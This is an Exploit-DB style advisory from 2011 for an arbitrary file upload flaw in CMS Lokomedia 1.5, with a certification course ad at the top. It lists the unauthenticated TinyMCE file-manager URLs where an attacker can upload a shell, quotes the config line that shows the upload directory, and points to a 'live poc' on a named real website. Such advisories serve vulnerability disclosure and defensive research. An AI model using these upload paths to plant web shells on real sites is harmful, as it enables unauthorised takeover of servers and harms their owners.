CMS Lokomedia 1.5 - Arbitrary File Upload

EDB-ID:

17014

CVE:

N/A




Platform:

PHP

Date:

2011-03-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

===================================================================
    CMS Lokomedia 1.5 Arbitary file upload vulnerability
===================================================================
   
Software:   CMS Lokomedia
Vendor:     http://bukulokomedia.com/home
Vuln Type:  Arbitary file upload
Download link:  http://bukulokomedia.com/lokomedia-1.5.rar
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
DORK:	use your skill and play your imagination :P

Gratz:
- Kuris : status udah merit aja beib.. kgak undang² iks..
- Richie : RebelgiRL (Limited edition.. lol) live is never flate so enjoy this live mate ^_^


References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
   
   
===================================================================
 

----------------------------------
 
    exploit & p0c

[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html	// upload your file here
		or
[!] http://host/tinymcpuk/filemanager/browser.html
    or
[!] http://host//tinymcpuk/filemanager/frmupload.html
    or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
 
    your shell or file will be placed here
 
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash)		*/
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;			// <= here 
/*==============================================================================*/
/* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */				// <= or here

----------------------------------

	live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
   
   
====================================================================
   
    Nothing Impossible In This World Even Nobody`s Perfect
   
===================================================================
   
==========================| -=[ E0F ]=- |==========================